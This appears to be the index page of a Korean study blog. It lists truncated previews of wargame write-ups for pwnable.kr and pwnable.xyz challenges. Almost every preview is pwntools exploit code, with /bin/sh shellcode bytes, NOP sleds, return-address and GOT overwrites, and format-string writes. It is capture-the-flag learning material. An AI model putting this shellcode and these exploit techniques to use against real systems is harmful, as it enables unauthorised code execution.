대충공부한거적어두는블로그

#include // 23byte shellcode from http://shell-storm.org/shellcode/files/shellcode-827.php char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; void shellcode(){ // a buffer we are about to exploit! // [ebp-0x1c] char buf[20]; // prepare shellcode on executable stack! strcpy(buf, sc); // overwrite return address! // [ebp+0x4] = buf+32 *(i..

from pwn import * p = remote("pwnable.kr", 9010) # p = process("./echo1") e = ELF("./echo1") jmp_rsp = b"\xff\xe4" # asm('jmp rsp') id = e.symbols['id'] shell_23 = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" shell_31 = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"..

from pwn import * argvs = ["" for i in range(2)] # DUMMY + call_execve_addr + action_addr + NULL_addr + NULL_addr pay = b'A'*0x20 + p32(0x5561676a) + p32(0x556b6534) + p32(0x55564a36)*2 argvs[1] = pay p = process(executable="/home/ascii_easy/ascii_easy", argv=argvs) p.interactive() #include #include #include #include #include #include #define BASE ((void*)0x5555e000) int is_ascii(int c){ // 0x80..

from pwn import * shellcode = '\x90'*0x1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" # 0xff8~ 영역에 매핑된다 argvs = [ p32(0xffdddfff) ] env = {} argvs.append(shellcode) for i in range(0x100): env[str(i)] = shellcode while True: p = process(executable="/home/tiny_easy/tiny_easy", env=env, argv=argvs) try: p.sendline("ls") p.recv(100) exce..

from pwn import * s = ssh(user='fsb', host='pwnable.kr', port=2222, password='guest') p = s.process(executable='/home/fsb/fsb') # p = process("./fsb") # key = 0x0804a060 = 134520928 # key+4 = 134520932 p.sendafter("(1)\n", "%134520928c%14$n") # esp+0x50에 key 주소 p.sendafter("(2)\n", "%134520932c%15$n") # esp+0x54에 key+4 주소 p.sendafter("(3)\n", "A"*15+"%20$n") # 하위 4byte에 0xf p.sendafter("(4)\n", ..

#!/bin/bash for i in {1..100} do output=$(timeout 5s python my_python_file.py) if [[ $output == *"FLAG{"*"}"* ]]; then flag=$(echo "$output" | grep -o "FLAG{[^}]*}") echo "FLAG FOUND: $flag" exit 0 else echo "FLAG NOT FOUND." fi done echo "FLAG NOT FOUND in 100 tries"​ from pwn import * p = remote("svc.pwnable.xyz", 30017) # p = process("./challenge") p.sendlineafter("Message: ", "minseo") cnry ..

from pwn import * p = remote("svc.pwnable.xyz", 30014) # p = process("./challenge") # 0x408 byte 채워야하므로 시간절약 위해 맨처음에 최대한 읽어놓자 p.sendafter("> ", "1") p.sendafter("data: ", 'A'*127) while True: p.sendafter("> ", "2") tmp = p.recvuntil("chars: ") num = int(tmp[8:-8]) if num>=14: p.send("A"*8) break if num!=0: p.send("\x00") p.sendafter("> ", "3") p.recvuntil('A'*135) win_addr = u64(p.recvline()[:-1..

# exploit 1 (using OOB) from pwn import * p = remote("svc.pwnable.xyz", 30013) # p = process("./challenge") e = ELF("./challenge") p.recvuntil("Name: ") p.send('\x00') p.recvuntil("Desc: ") p.sendline("hahaha") for i in range(8): p.sendlineafter("> ", "1") p.recvuntil("Name: ") p.send("\x00") p.sendlineafter("> ", "1") p.sendlineafter("Name: ", 'A'*0x80+'\x30\x20\x60') # strlen@got p.sendlineaft..

from pwn import * p = remote("svc.pwnable.xyz", 30012) # p = process("./challenge") p.recvuntil("> ") p.send("3") main_rbp = int(p.recvline()[:-1], 16) - 0xf8 print(hex(main_rbp)) fake_rbp = (main_rbp+0x9)&0xff real_rbp = main_rbp&0xff p.recvuntil("> ") pay = '119'+' '*0x1d+chr(fake_rbp) # 0x77 = 119 p.send(pay) p.recvline() # Invalid p.recvuntil("> ") pay = '1'+' '*0x1f+chr(real_rbp) p.send(pay..

from pwn import * p = remote("svc.pwnable.xyz", 30011) # p = process("./challenge") e = ELF("./challenge") p.sendafter("> ", "1") p.sendafter("Name: ", "minseo") p.sendafter("Age: ", "1234") p.sendafter("> ", "3") p.sendafter("Name: ", "minseo") p.sendafter("Age: ", b'A'*0x10+p64(e.got['printf'])) # s에 printf_got 대입 p.sendafter("> ", "1") p.sendafter("Name: ", p64(e.symbols['win'])) # 바로 다음문장 pr..